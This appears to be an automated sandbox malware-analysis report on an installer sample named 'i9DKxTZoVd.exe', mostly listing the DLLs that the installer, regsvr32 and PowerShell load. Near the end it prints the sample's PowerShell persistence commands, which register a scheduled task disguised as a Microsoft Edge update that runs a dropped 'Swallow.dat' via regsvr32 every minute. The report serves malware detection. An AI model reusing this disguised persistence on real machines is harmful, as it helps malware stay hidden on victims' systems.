Source: C:\Users\user\AppData\Local\Temp\is-O75JM.tmp\i9DKxTZoVd.tmpSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O75JM.tmp\i9DKxTZoVd.tmpSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O75JM.tmp\i9DKxTZoVd.tmpSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O75JM.tmp\i9DKxTZoVd.tmpSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O75JM.tmp\i9DKxTZoVd.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O75JM.tmp\i9DKxTZoVd.tmpSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O75JM.tmp\i9DKxTZoVd.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O75JM.tmp\i9DKxTZoVd.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O75JM.tmp\i9DKxTZoVd.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O75JM.tmp\i9DKxTZoVd.tmpSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O75JM.tmp\i9DKxTZoVd.tmpSection loaded: rstrtmgr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O75JM.tmp\i9DKxTZoVd.tmpSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O75JM.tmp\i9DKxTZoVd.tmpSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O75JM.tmp\i9DKxTZoVd.tmpSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O75JM.tmp\i9DKxTZoVd.tmpSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O75JM.tmp\i9DKxTZoVd.tmpSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O75JM.tmp\i9DKxTZoVd.tmpSection loaded: dwmapi.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\timeout.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Users\user\Desktop\i9DKxTZoVd.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Users\user\Desktop\i9DKxTZoVd.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\i9DKxTZoVd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KU6E7.tmp\i9DKxTZoVd.tmpSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KU6E7.tmp\i9DKxTZoVd.tmpSection loaded: msimg32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KU6E7.tmp\i9DKxTZoVd.tmpSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KU6E7.tmp\i9DKxTZoVd.tmpSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KU6E7.tmp\i9DKxTZoVd.tmpSection loaded: edgegdi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KU6E7.tmp\i9DKxTZoVd.tmpSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KU6E7.tmp\i9DKxTZoVd.tmpSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KU6E7.tmp\i9DKxTZoVd.tmpSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KU6E7.tmp\i9DKxTZoVd.tmpSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KU6E7.tmp\i9DKxTZoVd.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KU6E7.tmp\i9DKxTZoVd.tmpSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KU6E7.tmp\i9DKxTZoVd.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KU6E7.tmp\i9DKxTZoVd.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KU6E7.tmp\i9DKxTZoVd.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KU6E7.tmp\i9DKxTZoVd.tmpSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KU6E7.tmp\i9DKxTZoVd.tmpSection loaded: rstrtmgr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KU6E7.tmp\i9DKxTZoVd.tmpSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KU6E7.tmp\i9DKxTZoVd.tmpSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KU6E7.tmp\i9DKxTZoVd.tmpSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KU6E7.tmp\i9DKxTZoVd.tmpSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KU6E7.tmp\i9DKxTZoVd.tmpSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KU6E7.tmp\i9DKxTZoVd.tmpSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KU6E7.tmp\i9DKxTZoVd.tmpSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KU6E7.tmp\i9DKxTZoVd.tmpSection loaded: explorerframe.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KU6E7.tmp\i9DKxTZoVd.tmpSection loaded: sfc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KU6E7.tmp\i9DKxTZoVd.tmpSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: aclayers.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: aclayers.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: perfos.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: apphelp.dll
Source: C:\Windows\System32\regsvr32.exeSection loaded: aclayers.dll
Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dll
Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc_os.dll
Source: C:\Windows\System32\regsvr32.exeSection loaded: edgegdi.dll
Source: C:\Windows\System32\regsvr32.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\regsvr32.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\regsvr32.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\regsvr32.exeSection loaded: netapi32.dll
Source: C:\Windows\System32\regsvr32.exeSection loaded: pdh.dll
Source: C:\Windows\System32\regsvr32.exeSection loaded: powrprof.dll
Source: C:\Windows\System32\regsvr32.exeSection loaded: propsys.dll
Source: C:\Windows\System32\regsvr32.exeSection loaded: secur32.dll
Source: C:\Windows\System32\regsvr32.exeSection loaded: userenv.dll
Source: C:\Windows\System32\regsvr32.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\regsvr32.exeSection loaded: netutils.dll
Source: C:\Windows\System32\regsvr32.exeSection loaded: samcli.dll
Source: C:\Windows\System32\regsvr32.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\regsvr32.exeSection loaded: umpdc.dll
Source: C:\Windows\System32\regsvr32.exeSection loaded: perfos.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\is-O75JM.tmp\i9DKxTZoVd.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O75JM.tmp\i9DKxTZoVd.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O75JM.tmp\i9DKxTZoVd.tmpWindow found: window name: TMainFormJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KU6E7.tmp\i9DKxTZoVd.tmpRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Cloudy Floor_is1Jump to behavior
Source: i9DKxTZoVd.exeStatic file information: File size 1336796 > 1048576

Data Obfuscation

barindex
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\Swallow.dat' }) { exit 0 } else { exit 1 }"
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:INSTALL C:\Users\user\AppData\Roaming\Swallow.dat\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{5AF4B0CC-A257-4A7E-E201-D5DF536679FB}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries) -RunLevel Highest"
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\Swallow.dat' }) { exit 0 } else { exit 1 }"
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\Swallow.dat' }) { exit 0 } else { exit 1 }"Jump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:INSTALL C:\Users\user\AppData\Roaming\Swallow.dat\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{5AF4B0CC-A257-4A7E-E201-D5DF536679FB}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries) -RunLevel Highest"Jump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\Swallow.dat' }) { exit 0 } else { exit 1 }"
Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFB98FF8160 GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,CreateEventW,WaitForSingleObject,14_2_00007FFB98FF8160
Source: _setup64.tmp.1.drStatic PE information: real checksum: 0x0 should be: 0x8546
Source: is-8SV5O.tmp.7.drStatic PE information: real checksum: 0x0 should be: 0x12dcf2
Source: is-N7DV6.tmp.7.drStatic PE information: real checksum: 0x1b9034 should be: 0x1b957a
Source: i9DKxTZoVd.exeStatic PE information: real checksum: 0x0 should be: 0x14a56e
Source: _setup64.tmp.7.drStatic PE information: real checksum: 0x0 should be: 0x8546
Source: i9DKxTZoVd.tmp.0.drStatic PE information: real checksum: 0x0 should be: 0x127e44
Source: i9DKxTZoVd.tmp.6.drStatic PE information: real checksum: 0x0 should be: 0x127e44
Source: is-N7DV6.tmp.7.drStatic PE information: section name: .xdata
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFB5B78D2A5 pushad ; iretd 10_2_00007FFB5B78D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFB5B8A05C0 pushad ; retf 10_2_00007FFB5B8A05ED
